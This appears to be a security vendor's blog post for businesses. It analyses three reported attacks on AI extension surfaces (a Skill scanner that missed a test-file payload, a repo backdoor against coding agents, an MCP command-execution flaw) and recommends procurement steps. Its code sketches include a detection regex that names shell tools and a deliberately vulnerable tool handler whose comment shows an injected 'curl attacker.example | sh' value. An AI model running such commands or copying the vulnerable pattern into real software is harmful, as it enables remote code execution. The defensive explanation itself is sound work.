On May 7, VentureBeat's security desk reported that Anthropic's scanners for the Skills capability — the extension surface that lets a Claude deployment install packaged behaviors — passed every check on a sample under analysis, while the malicious payload sat in a test file the scanners did not treat as runtime code. Read in isolation, that is one product-security story for one vendor. Read against two other incidents from the previous week, it is something more important: the AI industry's extension surfaces have outpaced the threat models defenders apply to them, and buyers of agentic AI products need to stop treating “the vendor scans for that” as the answer.
The two adjacent incidents are not adjacent by accident. On May 5, VentureBeat reported a one-command attack pattern that turned an arbitrary public repository into an AI-agent backdoor surface for an OpenClaw-class workflow. On May 1, VentureBeat covered an Ox Security audit that found a command-execution flaw in roughly 200,000 publicly discoverable MCP servers running stdio-mode integrations. Three stories, three different layers of the AI extension stack — packaged Skills, repo-level coding-agent input, and Model Context Protocol server transport — and one shared root cause: the trust boundary the defender assumed existed was not the trust boundary the architecture actually enforced.
This post is for executives and buyers — anyone whose business has signed up for an agentic AI product in the last twelve months or is about to. The thesis is simple: the supply-chain layer of the AI stack has become a category-defining attack surface in 2026, and the procurement, governance, and architecture decisions that close the gap need to happen this quarter, not after the next quarterly board meeting.
Key Takeaways
- Anthropic's Skill scanners passed a sample where the malicious payload was placed in a test file rather than the runtime code path — the scanners checked the surface they were designed to check, and the attack chose a different surface.
- Three contemporaneous incidents — Skill scanners (May 7), a one-command repo backdoor pattern (May 5), and a 200,000-server MCP-stdio command-execution flaw (May 1) — share a single root cause: AI extension surfaces grew faster than the threat models defenders apply.
- OWASP's 2025 LLM Top 10 names Supply Chain (LLM03) as a top-tier risk for LLM applications, alongside Prompt Injection (LLM01) and Excessive Agency (LLM06) — the catalog already exists; the procurement habits do not yet match it.
- “The vendor scans for that” is no longer a sufficient procurement answer. Scanners are necessary but not sufficient; the procurement question is what runs when the scanner is wrong.
- The four-step buyer response — extension inventory, scanner-coverage disclosure, runtime credential isolation, and an approval gate on capability install — is the practical version of what NIST AI RMF GOVERN-MAP-MEASURE-MANAGE looks like for a real business this quarter.
What Actually Happened with the Anthropic Skill Scanners?
Anthropic Skills are the capability-extension mechanism that lets a Claude deployment install packaged behaviors — a domain-specific tool, a workflow integration, a specialized prompt-and-tool bundle — without the operator having to assemble the pieces by hand. They are how every business buying into the Claude ecosystem will add capability over the next 18 months, the same way add-ins extended Microsoft Office and packages extended every modern programming-language ecosystem before that.
Anthropic, per VentureBeat's coverage, runs scanners against published Skills to catch malicious patterns before installation. The reported failure was that the scanners passed a sample cleanly because the malicious payload sat in a test file, not in the runtime code path the scanners examined. The test file was still part of the published artifact and could be reached at install time or runtime depending on how the host environment treated test directories — but the scanner's threat model said “scan the runtime code,” and the attack said “okay, then we will not put it in the runtime code.”
This is a textbook scanner-coverage gap, not a novel cryptographic break. It is also exactly the failure mode the entire history of software supply-chain security has documented in other ecosystems: the package-registry scanner that examines the main module but not the build script, the dependency scanner that analyzes the manifest but not the post-install hook, the container scanner that checks the application layer but not the base image's setup scripts. The pattern is older than the technology in question. It just landed in the AI extension space on May 7.
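To make the coverage-gap mechanics concrete, here is a minimal Python sketch of the scanner class involved. To be clear about assumptions: the signature pattern, the skip list, and the directory layout are all invented for illustration, and none of this is Anthropic's actual pipeline. The point the sketch makes is that the skip list is the threat model, and anything it excludes is invisible to the scan.

```python
import re
from pathlib import Path

# Hypothetical signature list -- a stand-in for whatever patterns a real
# extension scanner matches against.
SUSPICIOUS = re.compile(r"curl\s+http|subprocess|os\.system")

def scan_package(package_root: str,
                 skip_dirs: frozenset[str] = frozenset({"tests", "test"})) -> list[str]:
    """Scan every .py file in a package, skipping directories the threat
    model treats as non-runtime code. The skip list IS the coverage gap:
    a payload placed under tests/ is never examined at all."""
    findings = []
    for path in Path(package_root).rglob("*.py"):
        if any(part in skip_dirs for part in path.parts):
            continue  # <-- the scanner's coverage boundary, and the bypass
        if SUSPICIOUS.search(path.read_text(errors="ignore")):
            findings.append(str(path))
    return findings

# A package whose only payload lives in tests/conftest.py scans clean --
# even though test files in the published artifact can still execute at
# install or test-collection time in many host environments.
```

The fix is not a better signature list; it is widening the scanned surface to everything in the published artifact that any plausible host environment can execute.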
The procurement implication is what matters for buyers. “Does the vendor scan for malicious extensions?” is no longer a yes/no question. The actual questions are what the scanner covers, and what the buyer's exposure is if the attack chooses the surface the scanner does not cover. That is a different procurement conversation, and one most agentic-AI buyers have not yet had with their vendors.

How Do These Three Incidents Fit Together as One Threat Class?
The three reports — Skills, repo-level backdoor, MCP-stdio exposure — read like three separate news cycles. They are actually three views of one underlying class of failure. The class is “the AI extension surface is bigger than the defender's threat model assumed, and the attack moved to the part the defender did not check.”
| Incident | Date | Extension Surface | Defender Assumption That Failed |
|---|---|---|---|
| Anthropic Skill scanner test-file bypass | 2026-05-07 | Packaged capability extensions for Claude | Scanner covers the runtime code path; test files are out of scope |
| One-command repo backdoor for OpenClaw-class workflows | 2026-05-05 | Coding-agent input from an arbitrary public repository | Cloning a public repo is a read-only operation that does not grant the repo authority over the agent |
| 200K MCP-stdio servers with command-execution exposure | 2026-05-01 | Model Context Protocol server transport | Stdio-mode integration is local and bounded; published server endpoints are not part of the agent's network attack surface |
In all three cases, the defender's threat model treated some part of the extension surface as inert. In all three cases, the attack chose specifically that part. This is the structural shape of the supply-chain attack patterns documented in the MITRE ATT&CK knowledge base under the Supply Chain Compromise technique (Initial Access) — Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain — applied to a new extension surface that the defender's existing threat model did not cover.
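For readers who want the MCP row in concrete terms, the sketch below shows the command-execution class at issue: an agent-facing tool handler that interpolates model-supplied text into a shell command. This is an invented minimal example of the vulnerability class, not the specific flaw from the Ox Security audit.

```python
import subprocess

def run_tool(arg: str) -> str:
    """A naive tool handler in an agent-facing server. `arg` arrives from
    the model, which means it arrives from whatever text the model has
    read -- including attacker-controlled repo or web content."""
    # VULNERABLE: shell interpolation means an arg like
    # "README.md; curl attacker.example | sh" executes as a command.
    return subprocess.run(f"cat {arg}", shell=True,
                          capture_output=True, text=True).stdout

def run_tool_safe(arg: str) -> str:
    """Safer shape: argv list, no shell, one allow-listed binary."""
    return subprocess.run(["cat", arg],
                          capture_output=True, text=True).stdout
```

The stdio-transport detail matters because the defender assumed locality bounded the input; once those servers became publicly discoverable, the same naive handler became a network-reachable command runner.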
The root cause is the velocity of AI extension surfaces relative to the velocity of defender threat-modeling work. Anthropic Skills, MCP servers, OpenClaw-class agentic harnesses, IDE-embedded coding agents, browser-extension AI agents, model-host plugin systems — every one of these is a meaningful new surface, every one is shipping on a six-week-or-faster cadence, and the threat models the buying side relies on are mostly inherited from a pre-agentic-AI era. The scanners that vendors build are working as designed; the design is one or two iterations behind the attack surface.
We covered the parallel pattern on the defender side in the AI security tools hijacked analysis — when adversaries hijacked AI security tools at 90+ organizations, the same root cause showed up: the defender's tooling itself was part of the unmodeled attack surface. The cluster is bigger than any single product. It is the category.

Where Does This Sit in the OWASP LLM Top 10 Framework?
OWASP's 2025 LLM Top 10 is the closest thing the industry has to a shared catalog of LLM application risks. The three risks most relevant to the May incidents are:
- LLM01: Prompt Injection — the underlying technique in many extension-surface attacks; an extension that reads attacker-controlled text and acts on it.
- LLM03: Supply Chain — the explicit category for vulnerabilities introduced through the LLM application's supply chain, including model packaging, plugin/extension distribution, and dependency provenance.
- LLM06: Excessive Agency — the architectural condition that makes a successful supply-chain or prompt-injection attack consequential; an agent given more authority than its decision-making warrants amplifies any compromise.
The full catalog is published at OWASP's LLM Top 10 site. The Skill-scanner story sits in LLM03 (a flaw in the extension supply chain), the OpenClaw repo-backdoor story sits across LLM01 and LLM03 (a supply-chain delivered prompt-injection-class payload), and the MCP-stdio story sits in LLM06 amplifying LLM03 (an excessive-agency runtime exposed via a supply-chain-distributed integration). The catalog already exists. The procurement habit of mapping a vendor product against the catalog before signing the contract does not yet exist for most buyers.
This is the part of the conversation that needs to land at the executive level, not just in the security team. Reading the OWASP catalog is a one-hour exercise. Mapping a vendor's product against it is a one-meeting exercise. Putting “produce a written mapping of your product against OWASP LLM Top 10 LLM01, LLM03, and LLM06 with named mitigations” into the next vendor renewal is a one-line addition to a procurement template. None of this is hard. It is just not the default.

What Does the Four-Step Buyer Response Look Like in Practice?
A practical buyer response, deployable this quarter regardless of which specific agentic AI products a business has installed, has four steps. The four-step structure maps cleanly onto the four functions of the NIST AI Risk Management Framework — GOVERN, MAP, MEASURE, MANAGE — translated into procurement and operational language.
Step One: Extension Inventory (NIST MAP)
List every AI extension surface the business has installed across every agentic AI product in use. Skills, plugins, MCP servers, custom-tool integrations, IDE-embedded coding agents, browser extensions, automation connectors. Most businesses have never produced this inventory and discover surprising entries when they do. Our shadow AI data risk analysis covers the broader pattern of how extensions install without IT visibility — the AI-extension version of shadow IT is one of the fastest-growing categories of unmanaged organizational risk in 2026.
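A starting-point sketch for the inventory step is below. A loud caveat on assumptions: the search roots are hypothetical placeholders, because real install locations vary by product, version, and operating system; treat the list as a template to fill in from each vendor's documentation.

```python
import csv
from datetime import datetime
from pathlib import Path

# HYPOTHETICAL search roots -- placeholders, not authoritative locations.
# Replace with the actual install paths your vendors document.
SEARCH_ROOTS = {
    "claude-skills": Path.home() / ".claude" / "skills",
    "mcp-servers": Path.home() / ".config" / "mcp",
    "ide-agent-extensions": Path.home() / ".vscode" / "extensions",
}

def build_inventory(out_csv: str = "ai_extension_inventory.csv") -> None:
    """Walk each extension root and record what is installed, where,
    and when it last changed -- the raw material for the NIST MAP step."""
    with open(out_csv, "w", newline="") as fh:
        writer = csv.writer(fh)
        writer.writerow(["surface", "entry", "path", "last_modified"])
        for surface, root in SEARCH_ROOTS.items():
            if not root.exists():
                continue
            for entry in sorted(root.iterdir()):
                modified = datetime.fromtimestamp(entry.stat().st_mtime)
                writer.writerow([surface, entry.name, str(entry),
                                 modified.isoformat()])

if __name__ == "__main__":
    build_inventory()
```

Even a walk this crude usually surfaces entries nobody remembers installing, which is the point of running it.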
Step Two: Scanner-Coverage Disclosure (NIST GOVERN)
For every vendor on the inventory, ask in writing what the vendor's scanner-coverage policy is. What does the scanner check, what does it not check, and what is the buyer's contractual recourse if a scanner-passed extension turns out to contain a payload the scanner did not detect? Most vendors will not have a documented answer on first ask. The act of asking is itself the procurement-discipline shift.
Step Three: Runtime Credential Isolation (NIST MANAGE)
No AI extension should run with a credential that exceeds the extension's stated scope. The architectural pattern is the same one we covered in the zero-trust AI agents and credential isolation post — every extension's authority is brokered through a gateway that scopes per request, logs per tool call, and can revoke in seconds. The Cloud Radix Secure AI Gateway is built around exactly this assumption, and the assumption is structurally correct regardless of which product the buyer ends up with: the architecture has to assume the scanner will eventually be wrong.
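The brokered-credential shape, sketched minimally below. This is not the Secure AI Gateway's API; it is an illustration of the three properties the step requires: per-request scoping, per-tool-call logging, and revocation that takes effect on the next call.

```python
import logging
import secrets
import time
from dataclasses import dataclass

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("ai-gateway")

@dataclass
class ScopedCredential:
    token: str
    scope: str        # e.g. "crm:read" -- never broader than the extension's stated scope
    expires_at: float

class CredentialBroker:
    """Minimal sketch of a brokered-credential gateway."""

    def __init__(self) -> None:
        self._live: dict[str, ScopedCredential] = {}

    def issue(self, extension: str, scope: str, ttl_s: int = 60) -> ScopedCredential:
        """Mint a short-lived, single-scope credential per request."""
        cred = ScopedCredential(secrets.token_urlsafe(16), scope,
                                time.time() + ttl_s)
        self._live[cred.token] = cred
        log.info("issue extension=%s scope=%s ttl=%ss", extension, scope, ttl_s)
        return cred

    def authorize(self, token: str, requested_scope: str) -> bool:
        """Check every tool call against the credential's scope and expiry."""
        cred = self._live.get(token)
        allowed = bool(cred and cred.expires_at > time.time()
                       and requested_scope == cred.scope)
        log.info("tool-call scope=%s allowed=%s", requested_scope, allowed)
        return allowed

    def revoke(self, token: str) -> None:
        """Kill a credential; denial takes effect on the next authorize()."""
        self._live.pop(token, None)
```

Under this shape, a scanner-passed malicious extension that reaches runtime can still only touch what its one scoped credential allows, and every attempt is in the log.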
Step Four: Approval Gate on Capability Install (NIST MEASURE)
Capability installation should be an event the operator can see, audit, and approve, not an autonomous workflow that runs in the background. The same approval-dialog pattern that scopes cross-application AI agent actions extends naturally to the extension-install layer. A business that does not know what extensions its agents are installing this week cannot mount a meaningful incident response when one of those extensions turns out to be the May 7 story's protagonist.
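A minimal sketch of the gate itself. The `do_install` callback is a hypothetical stand-in for whatever product-specific install mechanism applies; the two properties that matter are the explicit operator approval and the append-only audit trail.

```python
import hashlib
import json
import time
from pathlib import Path
from typing import Callable

AUDIT_LOG = Path("extension_install_audit.jsonl")

def gated_install(extension_name: str, artifact: bytes,
                  do_install: Callable[[], None]) -> bool:
    """No extension installs without an explicit operator 'yes', and
    every decision -- approved or not -- lands in the audit log."""
    digest = hashlib.sha256(artifact).hexdigest()
    answer = input(f"Install '{extension_name}' (sha256 {digest[:16]}...)? [y/N] ")
    approved = answer.strip().lower() == "y"
    with AUDIT_LOG.open("a") as fh:
        fh.write(json.dumps({"ts": time.time(),
                             "extension": extension_name,
                             "sha256": digest,
                             "approved": approved}) + "\n")
    if approved:
        do_install()
    return approved
```

The audit trail is what turns a May 7-style disclosure from a forensic scramble into a one-query lookup: which of our agents installed what, and who approved it.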
The Mend AI security governance framework analysis covers the parallel governance pattern from the application-security tooling side; the buyer-side response above is the procurement and operational counterpart.

How Does This Connect to the AI Coding Agent Risk Picture?
The AI coding agent class is where the extension-surface threat model and the operational-blast-radius question collide most directly. We walked through the dev-team and vendor-chain implications in the AI coding agents prompt injection and secret leaks post — the short version is that an AI coding agent with shell access and a packaged-extension dependency tree carries the worst of both the supply-chain story and the excessive-agency story at the same time.
The Skill-scanner story compounds the AI coding agent picture in a specific way: many of the extensions a coding agent uses are themselves Skills-class packaged capabilities, distributed through extension registries that may or may not run scanners with adequate coverage. A coding agent that runs an extension the vendor's scanner cleared but that contains a test-file payload is the multi-product version of the May 7 incident. The incident's reach is not bounded to one product because the extension model is not bounded to one product.
The stage-three AI agent threats defense playbook covers the post-deployment monitoring layer that catches the cases the install-time scanner missed. The two layers are complementary — install-time scanning, runtime monitoring — and neither is sufficient on its own. The buyer's job is to require both from any agentic AI product that runs against business-critical data.
What Should a Fort Wayne Business Take From This?
Cloud Radix is based in Auburn, serves Fort Wayne and the wider Northeast Indiana market, and our security and architecture practice is structured around the assumption this post is making — scanners are insufficient, the extension surface is the new attack surface, and the buyer's procurement habits need to catch up. If your business has installed agentic AI products in the last twelve months and has not produced an extension inventory, had a scanner-coverage conversation with the vendor, or wired credential isolation through a Secure AI Gateway, the May incidents are the news hook that justifies that work this quarter. Reach out for a 30-minute architecture and procurement review and we will walk through the four-step buyer response against your specific product footprint.
Frequently Asked Questions
Q1. What are Anthropic Skills?
Anthropic Skills are the capability-extension mechanism for Claude deployments — a way to package a domain-specific tool, workflow integration, or prompt-and-tool bundle that a Claude installation can consume as a unit. Skills are how Claude-deployment buyers are expected to add and customize capability over time, similar in pattern to plugins or add-ins in other software ecosystems.
Q2. What does it mean that the scanner passed but the malicious code was in the test file?
It means the scanner examined the surface it was designed to examine — the runtime code path — and the attack placed its payload in a different surface (a test file in the same package) that the scanner's threat model did not cover. The scanner was not bypassed in a clever cryptographic sense; it was bypassed by choosing a part of the package the scanner did not check.
Q3. What is OWASP LLM03 and why does it matter here?
LLM03 in the OWASP 2025 Top 10 for LLM Applications is the Supply Chain risk category — vulnerabilities introduced through the LLM application's supply chain, including model packaging, plugin and extension distribution, and dependency provenance. The Skill-scanner story is a textbook LLM03 incident, and the OWASP catalog already provides the procurement language buyers need to require vendor mitigations.
Q4. Should we stop using Anthropic Skills, MCP servers, or agentic coding tools because of these incidents?
No. The pattern these incidents reveal is structural to the AI extension surface, not specific to any one vendor or product. Stopping use of these tools would forgo their operational value while not addressing the underlying procurement-discipline gap. The right response is the four-step buyer pattern — extension inventory, scanner-coverage disclosure, runtime credential isolation, and approval gating on capability install — applied across every agentic AI product in use.
Q5. What is a Secure AI Gateway and why does it help?
A Secure AI Gateway is an architectural layer that brokers an AI agent's access to credentials, tools, and external systems. Every agent action is scoped per request, logged per tool call, and revocable in seconds. Against the Skill-scanner-class story, the gateway is the architectural assumption that the scanner will eventually be wrong — even if a malicious extension reaches install or runtime, its blast radius is bounded by what the gateway lets it touch.
Q6. How fast is this threat class evolving?
The three incidents discussed here landed within seven days of each other across three different layers of the AI extension stack. The cadence is high enough that a quarterly procurement-review cycle is the right rhythm — anything slower means the procurement posture is at least a quarter behind the attack-surface evolution. NIST AI RMF GOVERN-MAP-MEASURE-MANAGE provides the policy scaffold; OWASP LLM Top 10 provides the risk catalog; the buyer's quarterly review is what translates both into actual posture.
Q7. Does this threat class matter for Fort Wayne and Northeast Indiana businesses, or only for enterprise buyers?
It matters at any scale where an agentic AI product is installed. The extension surface is determined by the product, not the buyer's revenue line. A 30-person Fort Wayne professional-services firm running an AI Employee with installed Skills, MCP servers, or coding-agent extensions has the same structural exposure as an enterprise buyer running the same products — and typically less in-house security capacity to triage an incident. The four-step buyer response is the same; the implementation effort is smaller because the extension footprint is smaller.
Sources & Further Reading
- VentureBeat: venturebeat.com/security/anthropic-skill-scanners-passed-every-check-malicious-code-test-file — Anthropic Skill Scanners Passed Every Check — The Malicious Code Was in the Test File
- VentureBeat: venturebeat.com/security/one-command-open-source-repo-ai-agent-backdoor-openclaw-supply-chain-scanner — One-Command Open-Source Repo AI Agent Backdoor: OpenClaw Supply-Chain Scanner
- VentureBeat: venturebeat.com/security/mcp-stdio-flaw-200000-ai-agent-servers-exposed-ox-security-audit — MCP-Stdio Flaw: 200,000 AI Agent Servers Exposed (Ox Security Audit)
- OWASP: genai.owasp.org/llm-top-10 — OWASP Top 10 for LLM Applications (2025)
- NIST: nist.gov/itl/ai-risk-management-framework — NIST AI Risk Management Framework
- MITRE: attack.mitre.org — MITRE ATT&CK Knowledge Base
Audit Your AI Extension Surface This Quarter
The scanner passing is not the same as the extension being safe. Cloud Radix will run the four-step buyer response against your installed agentic AI products and wire credential isolation through a Secure AI Gateway where it matters.